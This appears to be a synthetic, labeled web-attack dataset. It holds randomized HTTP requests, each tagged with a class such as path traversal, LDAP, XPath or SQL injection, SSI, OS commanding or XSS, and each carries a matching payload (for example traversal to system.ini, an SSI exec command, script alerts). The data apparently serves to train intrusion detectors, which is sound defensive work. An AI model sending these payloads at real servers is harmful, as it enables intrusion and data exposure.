End - Id: 42956
Start - Id: 44908
class: PathTransversal
GET /yMmiCe26aleeio.css?eseaW1t=8ocylhhA&rrgemwbssuplpOe=tr3tsuea&Tuop=s8Q&U0lzf4t=sat&ay=eiyyeHs7nieeicycmt&eoAbeeouali0=h%40W33zo1mh_&pdrtce=9_z0NBcLA&nonceup=seicfu7ejRhimhrq&s4oiT4nunfnm=Sehm+annnnium+A&cu9Vlhtwxdc=eeitmt+sdeotue&twdme=wm2H%40cBi1&hOqhT@sn3=57057416&Wn4b58H9alrti=oEihaeinnseslgy&rs=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&mha=xtermoem HTTP/1.0
Host: www.hpcAgA.uk
Connection: aiD1q
Accept: audio/x-wav;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rOtna1bb-Eo
Cache-Control: no-store
Client-ip: 210.44.65.123
Cookie: OautoexeceCDrrechok5Nlog=rme1eeaRNoCsxmlt;mailkGmdnullo3iU0=24
Cookie2: $Version="2"
Date: Sun, 05 Jun 05 02:32:05 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 23 Oct 05 16:05:19 UTC
If-Unmodified-Since: Fri, 13 Feb 04 24:06:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: /ihD3/ecsO8ovA/i9s8eczj.cgi
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: dC0zbf9 http://www.dluonhT.uk
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44908
Start - Id: 37919
class: LdapInjection
GET /ryEhto9irecbRdh6o/fOdrmHahfb/qkPWUojFUP/GF--_1JQc.png?IVJY@j=s&tniRnhwnju08=jxxQJT-GpkIa&Rwhw5aN1e=3232&rhao4=3501497676&etnjom4lenltee=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&SgeoSnLetn=eaid+8%26%40u+ilservices+&_FzMmiJnXfzW=8&Bfnkgw0yiT_p=hteO%3E&2S-.=pf&hmhasrwe73ze=6vn&0rK_HQL5LpB=01814351&dtdabyrcto=316 HTTP/1.0
Host: 249.172.178.127
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1258;q=0.7, x-mac-greek, iso-2022-jp;q=0.6
Accept-Encoding: identity
Accept-Language: EDf-eseTf4sm;q=0.5
Cache-Control: only-if-cached
Client-ip: 223.210.28.59
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Mon, 13 Aug 07 15:53:01 UTC
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: Eoel=5enbA;joo0
From: 5q8rwd@hbdoc4.be
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Wed, 15 Dec 04 06:22:33 GMT
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: "rmUzG-z4owfuX9cIyerf"
Max-Forwards: 6303
MIME-Version: 2.1
Pragma: h='n'
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic MHdFbHRpZWw6czVodGVpbWg=
Range: 55502-651
Referer: /e8Eetein/hoDognn.jpg
TE: deflate
Trailer: Accept-Charset
User-Agent: pmee/4.8
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/7.5 221.148.150.114:3
Transfer-Encoding: gzip
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37919
Start - Id: 49470
class: XPathInjection
GET /kcjsu0aoae.aspx?aYnon=tooaahss&l228oodaxsetir8=a1eQTSDuvBO&oostfnwvtmAehr=heltede&iw9entmetnw2t=67592036&lcbmt=5084999&eftlwftozeLiie1=q2DN7bEP&5f=602++++or++++1%3C+++rmerc%2Fa5h%2Fm%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+++or++19%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ihNijrwu=sock_streamg&3elueeSstace=t2ehz6hRYwINgmse&KJXMuGk1RVa.=ecpatTewon45&g_iV=iHyr3T2hhooon&OHftmNstny6ei=11 HTTP/1.1
Host: 104.249.134.34
Connection: keep-alive
Accept: image/*;q=0.0, text/*;q=0.8
Accept-Charset: iso-8859-8-i, x-mac-japanese;q=0.7, cp-932, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: U-Etegra1, wo9eeQm-hei3iZ;q=0.1, abtiaYhi-1n, iidef-0gh;q=0.1, esa7a-a
Cache-Control: max-age=27
Client-ip: 31.53.19.85
Cookie: rtoontte=l0d1reti3vomeuarr;dOe=qWC;rt=bhtpass=efnri
Cookie2: $Version="182"
Date: Sun, 28 Feb 10 03:51:04 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 5renn=tz0whpeo
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Thu, 22 Sep 05 03:08:52 CET
If-Match: *
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 411
MIME-Version: 2.1
Pragma: qqiht=lh
Proxy-Authorization: ledega 1phesBu=nKn6nse
Authorization: Digest nonce
Range: -012
Referer: /meet9a/eiog/d6eeoaf/j3Zfn/Tsweep.asmx
TE: gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: afllnNbe (aqLCxroOl; nn5haDpvF7)
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: gzip
Upgrade: nueei/2.7, enf/8.5
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49470
Start - Id: 37329
class: LdapInjection
GET /cvcsi8na/rRQdufaVa/mVWRQWbf3IQ_QSVkdgM/bBo/3e/oJb/vdiznjtI8rtst6OatBe/ohennapm1lurhedaa/CoRKJXXakaqyprocessing-instruction.id/nullqsamzgdocumenty4i9Mn/l80dpcfn/frive8o.php4? HTTP/1.0
Host: 196.193.142.120:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: Obae=euNel
Client-ip: 8.243.125.138
Cookie: 0lWcmn=wnn86;B6wZ=eu2t;Gnmrhcmmthc=3123892;vtef=3670075;Llao5n6d=shPzMGVI6W_
Cookie2: $Version="04"
Date: Wed, 30 Aug 06 11:20:39 UTC
ETag: W/"AgBJxgl1AIY7DzU9db"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Fri, 22 Jun 07 21:33:42 GMT
If-Unmodified-Since: Tue, 10 Jan 06 15:46:10 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Feb 07 05:23:46 CET
Max-Forwards: 9791
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: dy7k pgiy=6bvq
Authorization: Digest qop=auth-int
Range: 1-568088,6956-8,075-
Referer: http://www.xpid6.gov/hgoE/tgNsiiv/liiefi8/tnse.nsf
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 5.0; w9-wr; rv:4.7.5) Gecko/72234427
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-OS: Solaris
UA-Color: color16
Via: 1.8 www.heTdc.jpeg:64723, FTP/7.2 137.162.177.89, 7.2 95.251.84.190
Transfer-Encoding: identity
Upgrade: iHmLaa/1.0, enm/6.7, Feqe/5.3, 5la06/5.6
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 100.131.43.78
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37329
Start - Id: 36866
class: LdapInjection
GET /tl3OWnZjK/aq.F/qaTttxoetrsroterNuav/ffEbpMv/sAjsd5laa1e/mLvd@oBwstZL--P@Oc8/thieircii76i4tbt.cgi?2tns6teoaotf=dhcWoX-%40I&dsrcigf=n8yopis&wzeni=hRZtRd&hsiotyQgrpv=coa&nreyrtxsasy=0&e0Aneaaasgugse=9%3BTtDzthan2&w5ueeookAtecmt=4&shh5moccehits=nPWklu9Tv&oi=312805&aiefw=Cyri+6tnte&tidrbihoE5ijlo=sekasabthUhrta2c&acHniei2=624198&nR=32131104&ebk0npeazYi3=0&zoriRh9w=9343132934 HTTP/1.0
Host: 143.17.125.138
Connection: urm2esR
Accept: application/zip
Accept-Charset: shift_jis
Accept-Encoding: Aa)(&(objectClass  =gs*)
Cache-Control: no-transform
Cookie: ttieDq=0o8;zcxM2Xy_2=dqe<;2len0ianAh=10057571
Cookie2: $Version="2"
Date: Thu, 12 May 05 10:04:52 CET
From: esad@Ayit.it
If-Modified-Since: Sun, 29 Aug 04 19:27:20 GMT
If-Unmodified-Since: Wed, 06 Feb 08 06:05:58 GMT
If-None-Match: "VTMWyOI8MPikB1wX0"
If-Range: *
Max-Forwards: 7022
Pragma: 8ecy=o
Proxy-Authorization: nNZHod ya5p=awun
Referer: http://www.fnarz4r.com/rcsro/s7axog/hnci7jh.jpeg
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 3.7; df-gb; rv:2.6.8) Gecko/37493779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36866
Start - Id: 42287
class: SqlInjection
GET /tSoocreeCo9Angzer73/3srlMc9pIdSeEeeesr/r_/t1mLUho/EitlgbmyS/tpORIkmT@_9yVBzEb/nWGGreF69e73pqNXo@iN.php3?iorn=OR++4%3E565838778854&puy=318&fHineuxlel=n%3F%3A HTTP/1.0
Host: 175.77.131.76
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Ei0iob-Timybeo, io-s, aaqesrT-D9my;q=0.8, aa23aesa-SAo;q=0.5, aaiL1-isca;q=0.8
Cache-Control: max-age=8
Client-ip: 94.165.178.34
Cookie: odshhisdio5=5xlQqQ;snz=zohprlmgehh;;Sa2acds8dtlotsb=satmys;8fwem=mb7eEi4dtbduQpfeti;ft5dltprg1adA=ts;sbpgxtllwtfcd=ehmyye ynswemg 0-r
Cookie2: $Version="134"
Date: Thu, 19 Aug 04 16:08:32 GMT
ETag: W/"wv4.brtflOaYlkka"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Thu, 21 Jun 07 15:50:40 GMT
If-Unmodified-Since: Sun, 31 Jul 05 24:20:45 GMT
If-Match: "TIvclBse10CwPioieO"
If-None-Match: *
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 74
MIME-Version: 2.3
Pragma: eisd=eehom
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: ojo1 2ea21rtw=lubthm
Range: 882861-05
Referer: http://www.dqberoa.st/2fau/5apo.sh
TE: trailers
Trailer: Upgrade
User-Agent: issStczsaoxqfin
UA-CPU: Sparc
UA-Disp: 889,144,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 443x7648
Via: HTTP/4.9 www.t7IsaWuQ.html, 0.3 www.dta9.tiff
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 767 136.91.228.117 "ogadceLeitGounodog" 
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 757119034
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42287
Start - Id: 45909
class: PathTransversal
GET /hln.html?8faeca=eobodytcSeehfh&CB0R=ds&nraitcObeqswc=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 115.10.91.163:84243
Connection: close
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: reebn4f-oea, g2-eans;q=0.0
Cache-Control: Gel=9l
Client-ip: 132.53.138.134
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Thu, 10 Mar 05 10:38:42 CET
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 19 Mar 08 15:43:36 GMT
If-Unmodified-Since: Wed, 06 Apr 05 14:50:07 GMT
If-Match: *
If-None-Match: "XQDWR2ZTBCKK95aNw9"
If-Range: Tue, 16 Mar 10 15:18:48 UTC
Max-Forwards: 59
MIME-Version: 1.5
Pragma: of=a
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest response="999d4D43Bcca48Ad2E4eC683DA0F2E7F"
Range: -106180,0973-,3598-
Referer: /tf32jy.jsp
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: pufsaQ/4.3.2.0
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: 0.7 175.113.250.250, 2.3 www.qrHneloM.shtml
Transfer-Encoding: deflate
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7645574673
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45909
Start - Id: 45778
class: PathTransversal
GET /ohst/u1ssh.swf?qe0=passthrugmg&ehsCE3eahs8ooa4=..%2F..%2F..%2FWINNT%2Fautoexec.bat&o0ynn4=0180 HTTP/1.1
Host: www.itaetnl.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.1
Accept-Encoding: compress;q=0.5, identity;q=0.7
Accept-Language: xolgpqj-u, idnht-ii, rfavshn-e6uf9mp;q=0.9, neinor0r-wdtni;q=0.4, y-dbhBu
Cache-Control: no-store
Client-ip: 79.240.194.64
Cookie: 0O=pqotive;aebr=71343494;g931Ih=qtn;xaa=eh0baq2eadminmochago;etelehSre1y6Imy=wglocationr9mmpositione;nslemi2Ra9caLLs=71
Cookie2: $Version="9"
Date: Fri, 05 Sep 08 09:31:32 GMT
ETag: "o-Sve-wo4yNnUq.x7"
Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Fri, 30 May 08 15:08:07 GMT
If-Match: *
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 0
MIME-Version: 2.4
Pragma: qvroGgKh='xheadin'
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Basic RThtbjpldDllZUl1aQ==
Range: 61230-1,22438-
Referer: http://Nnrhe.be/liaedwq/ioeitK/glvcLias.mpeg
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: e5rr/7.1.5.0.4
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7251x584
Via: HTTP/4.4 www.hpseIo.gif, 3.8 www.imr7y.jpg:2, 4.9 www.Fsod.js:0868
Transfer-Encoding: identity
Upgrade: uit4/0.5, toct/8.1, blgp/4.0
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 726601184
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45778
Start - Id: 39709
class: SSI
GET /ydXLq2/y0uaooaeamnrr/ellEsCn/omo433iTaa/ge7oJcPz/5imho/n37/eoto/opDEhOnOfleiWaoc/o2zittewdBuaoe/cO-XtN-UoCodr.jpeg?ztBueben=oAn0dacstS&ss=83&2sKasez5=inune5hats&GLfXjFmiK8Z6=Mm3jf0jXahhcm&dsjtumc8epl8rco=oewtltaefxm&rmtltrkterP3=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&tntemihcrpP=9jd%26wo%25ennDEmtm&3twyshEetto3nor=rot8echusaAdg HTTP/1.1
Host: www.lpq0moRf0s.com
Connection: keep-alive
Accept: text/plain;q=0.5, text/*;q=0.9, video/quicktime;q=0.9
Accept-Charset: iso-8859-7, iso-8859-3;q=0.2, x-mac-japanese, iso-2022-jp, windows-1253
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 69.213.71.134
Cookie: aTemenhlf5s=559;tue00tfc7a=oammLD-B7hN_;b0hiw=sLj;ini=ici4oSnaei
Cookie2: $Version="1"
Date: Fri, 29 Aug 08 08:01:22 GMT
ETag: "eQt1lpFUkKACMULNX9"
Expect: bufr=y5wn1
From: en976nr@rtqaia.net
If-Modified-Since: Fri, 22 Aug 08 22:32:42 CET
If-Unmodified-Since: Thu, 28 Sep 06 01:04:01 CET
If-Match: "T9yLUIs4qRNry4USc2"
If-None-Match: *
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 15
MIME-Version: 1.4
Pragma: detqeL=scetpb1g
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: http://www.cssut.gov/wrnsoaoT/Bn9ph.pl
TE: gzip,deflate
Trailer: From
User-Agent: Mozilla/6.7 (X11; U; Linux i586 1.2; hc-gf; rv:3.5.5) Gecko/70104563
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: fMpdo
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39709
Start - Id: 37162
class: LdapInjection
GET /npKarIot/rJAvv9nEs-Y2MbMvqc_5/w_lifFHf2.8wfpQKl/des/aIFQj/E%uX/dJ-Y7/ry275Cwy/e4crgNrH5F.gif?td=mianpri%7Et%28dese-c%28i0a&tr3=%29+%28+%7C++++%28displayName%3Dhad*%29++++%28name%3D+had*+%29%28++++mail%3Dhad*+++%29 HTTP/1.0
Host: www.n3asisatl.biz
Connection: eorhjdx
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=232
Client-ip: 188.238.110.194
Cookie: odc=s;vc=h9_JiB7B;fcoDe=okthbesatdpijboea;ek13rlTotusinoT=8128768
Cookie2: $Version="45"
Date: Wed, 21 Jan 09 24:08:04 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Mon, 10 Mar 08 15:19:04 CET
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: *
Max-Forwards: 40
MIME-Version: 5.3
Pragma: 1nohhrcc=wb2o
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: /cAghsna/ntex/sed5Ea.doc
TE: trailers
Trailer: Connection
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 4.9; Hd-nR; rv:0.3.0) Gecko/75624190
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5776x2501
Via: 1.4 www.Eetgej.png, 8.5 100.100.233.3:6541, 0.5 www.lhes1.js
Transfer-Encoding: compress
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37162
Start - Id: 42131
class: SqlInjection
GET /txtX4n6Qd7/fTF/dytqHJlKvUDreaZ.exe?ssksnaysic0=45&TDbbeoVhthfit=and+++0%3C%3E%28select++count%28*%29++from+ntibiE+where+alonnrr%3C%3E%29&rarioomyen7fy3=htb HTTP/1.0
Host: 217.252.252.172:14497
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress, identity;q=0.6, deflate;q=0.7
Accept-Language: scn4-ateee3
Cache-Control: only-if-cached
Client-ip: 56.112.127.62
Cookie: ta6rbcvehhnec=o8an;ga6gna=7gI;1TmoergmIshnc=inwo-VuSrJp;ie8z0iuStr=2469336;tentren1crnedai=whglET:m0se;nd3u4h=4
Cookie2: $Version="9"
Date: Thu, 14 Aug 08 13:27:45 CET
ETag: "xYdmJleeSyDjLpZcQM"
Expect: ahiWkN=nO6ei
From: 8EqrmfL@m6me9i3j.cz
If-Modified-Since: Fri, 08 Sep 06 13:58:39 CET
If-Unmodified-Since: Tue, 19 Jun 07 20:21:13 GMT
If-Match: *
If-None-Match: "95dITTUXPTlgzhu_OY"
If-Range: ".XEjnvKVuicL@eRpYd"
Max-Forwards: 676
MIME-Version: 7.0
Pragma: l9g=g
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=95C88C7A
Range: 80-3804,023297-91,09-
Referer: http://l0drnrta.de/oeJtod/3smbryed/rhrU/t8e7w1r/lqioarEi.mpeg
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.1 (X11; U; Unix 2.1; it-Oe; rv:3.0.1) Gecko/82488721
UA-CPU: StrongARM
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 636x9570
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42131
Start - Id: 36390
class: OsCommanding
PUT /eZ5CgRtiFICaKh/snLI@nSh@tx/sc.aspx? HTTP/1.1
Content-Length: 199
Content-Language: fxrn8,lhysya
Content-Encoding: identity
Content-Location: http://www.Loeeu.gov/hhwYHlgt/mSgoEsp.sh
Content-MD5: emhFbHhpZWVyZmpuY29abw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 24 Nov 07 21:47:13 GMT
Host: www.eL7oretse.biz
Connection: 7tsptoos
Accept: image/*
Accept-Charset: windows-1253;q=0.5, euc-tw;q=0.1, x-mac-arabic, windows-1250
Accept-Language: tUtpe-8A1mhu, fse-sp;q=0.1
Cache-Control: no-transform
Cookie: kqhomeUOxvw4hBL=<!--   #exec     cmd="c:\progra~1\ta\enr46deN\3spu.exe d:\edfno\www.raelndetst.org\ntf\database.mdb /x exporttofoxpro"-->
Date: Thu, 23 Aug 07 15:02:07 UTC
From: Aqzrmco@ayme7rIyG.net
Max-Forwards: 65
Referer: http://nausoa.ch/lboh/iehhaytb/p2n1h/e6har.tiff
User-Agent: Mozilla/6.9 (Windows; U; Win98 7.4; oe-sd; rv:7.6.8) Gecko/41406788

8U8J-cU%uvzY=l0inZ&foaga=0P9FalD&iuxteo8sai=Eu5dnl0bmNe&notrgSe=febdRVqt&ddeh7b=as%3B%26s&duntifrv=42711&8wTswtehggierbm=4133345&k1-GaI3ogtg=7hehiter&Hiqs=135424097&hnsnook3aorrqe=1&9i9Bxq4nemnE=3532

End - Id: 36390
Start - Id: 47584
class: XSS
GET /tr/n4iAsEttso4ifnfti/ei4v/es5e7/orUvnUYuWXxrL/ursemaned1v/asLRiFF2Dj4kr/nprocessing-instructionTgivwblib4TCz/elIpsQL.js?alrshk2i=522282469&ytrq=423&lsssot2esiys=6646&b2_uMadminCy_=tGqpt&nraaoinqCs=%3Ciframe+src++%3D+%22+++vbscript%3A%5Balert%28%27yeoHueexi%27%29%3B%5D++%22++++%3E&rAthhx=brsscdhsto HTTP/1.1
Host: www.v0nnofe.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: isiri-3342, isiri-3342, windows-1250;q=0.9, iso-8859-8-i;q=0.1, us-ascii;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 242.31.170.141
Cookie: yphoe=rLFiv;oaxeatkesen=gspas2av8erd6n4npJ;shiif=n-MNWPfB7L;oiomsyP=414152
Cookie2: $Version="8"
Date: Fri, 02 Jul 04 16:08:46 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Mar 08 17:21:40 GMT
Max-Forwards: 40
MIME-Version: 6.6
Pragma: wdtIulo='ce'
Proxy-Authorization: Digest qop=m2ta
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 849916-
Referer: http://www.obmbrei.com/l2dadEc.pl
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (compatible; MSIE 7.2; Linux i386; nicogTqdD; wl8sd)
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: HTTP/1.5 131.21.20.244, iktlJz/9.6 www.ies9.htm:10500
Transfer-Encoding: gzip
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47584
Start - Id: 47059
class: XSS
GET /l71lmzKI0vcyiT-/ontrbgmZgCP6.x/e6FfTiSYZ8zcdUT/nhtb6oiddt/rrI1t03eeacit/i3l@7r5DVSBvhMne/eahrsuDogtmfmsN/fPAD70cU.xsO/e-/adeifa/mvar_access_logW.msf?mdleliotren=pbsijemat8eedxu&SJLEuEpwBrcp=%3Cscript+++%3Ealert++%28canmadrwareu3d.s50en%29%3C%2Fscript+%3E&oipntia=727096318&0uyhMsS=nfrNnh4t&eweD=sa-Cc&afStatprtij=wtlrzpitecgW&rue0iz5yakt=C+v%24tqW&vUFlSlg2h=7crU1Jv&cz9hs1lasp=fl1v424PIo_&mlohabovjNtjsem=0637432&fpsysD2audmcbf=hihrmgh&y5JKHfv=98697&rTse=9998&nhitnetrt=1 HTTP/1.0
Host: 87.184.17.61:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: vnOnv='aiaAN'
Client-ip: 66.107.218.203
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="3"
Date: Sun, 07 Dec 08 23:52:03 UTC
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Sat, 17 Nov 07 22:56:28 UTC
If-Unmodified-Since: Sun, 26 Dec 04 20:13:33 GMT
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 00
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=7bjofTn
Authorization: Digest uri=http://www.re3ba6.cz/ritpti/aha8yls.txt
Range: 7-
Referer: /lhooj/sa4ez76/ydah.swf
TE: deflate;q=0.8
Trailer: Cache-Control
